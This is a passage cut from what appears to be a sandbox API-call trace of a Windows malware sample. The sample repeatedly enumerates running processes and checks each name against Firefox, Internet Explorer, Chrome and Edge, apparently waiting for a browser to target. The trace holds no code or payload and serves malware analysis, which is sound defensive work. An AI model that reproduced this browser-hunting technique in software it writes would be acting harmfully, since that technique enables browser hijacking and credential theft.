hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.255] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.255] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.255] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.255] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.255] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.255] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0162.255] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0162.255] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0162.255] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.255] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.256] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0162.256] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0162.256] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0162.256] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.256] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0162.257] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0162.257] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0162.257] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0162.257] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.257] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.257] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0162.257] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0162.257] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0162.257] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.257] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.258] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0162.258] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0162.258] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0162.258] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.258] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.258] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0162.258] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0162.258] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0162.258] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.258] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0162.259] CloseHandle (hObject=0xd4) returned 1 [0162.259] Sleep (dwMilliseconds=0x3e8) [0163.405] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0163.408] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.408] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0163.408] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0163.408] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0163.408] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0163.408] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.409] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0163.409] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0163.409] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0163.409] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0163.409] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.410] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0163.410] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0163.410] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0163.410] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.410] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.410] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0163.410] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0163.410] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0163.410] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.410] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.411] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0163.411] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0163.411] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0163.411] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.411] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.411] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0163.411] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0163.411] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0163.411] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.411] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.412] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0163.412] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0163.412] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0163.412] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.412] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.413] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0163.413] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0163.413] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0163.413] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.413] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.413] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0163.413] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0163.413] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0163.413] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.413] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.414] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0163.414] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0163.414] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0163.414] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.414] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.414] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.414] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.414] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.414] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.415] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.415] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.415] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.415] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.415] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.415] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.416] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.416] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.416] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.416] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.416] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.416] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.416] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.416] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.416] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.416] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.417] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.417] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.417] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.417] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.417] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.417] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0163.417] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0163.418] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0163.418] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.418] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.418] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.418] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.418] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.418] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.418] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.419] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.419] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.419] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.419] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.419] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.420] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0163.420] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0163.420] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0163.420] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.420] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.420] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0163.420] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0163.420] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0163.420] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.420] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.421] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0163.421] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0163.421] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0163.421] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.421] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.421] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.421] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.422] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.422] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.422] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.422] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0163.422] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0163.422] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0163.422] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.422] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0163.423] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0163.423] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0163.423] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0163.423] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.423] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0163.423] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0163.423] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0163.423] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0163.423] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.423] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0163.424] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0163.424] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0163.424] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0163.424] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.424] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0163.424] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0163.424] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0163.424] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0163.424] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.425] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0163.425] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0163.425] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0163.425] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0163.425] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.425] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0163.426] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0163.426] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0163.426] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0163.426] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.426] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0163.426] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0163.426] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0163.426] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0163.426] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.426] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0163.427] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0163.427] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0163.427] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0163.427] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.427] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0163.427] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0163.427] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0163.427] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0163.427] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.427] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0163.428] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0163.428] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0163.428] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0163.428] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.428] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, 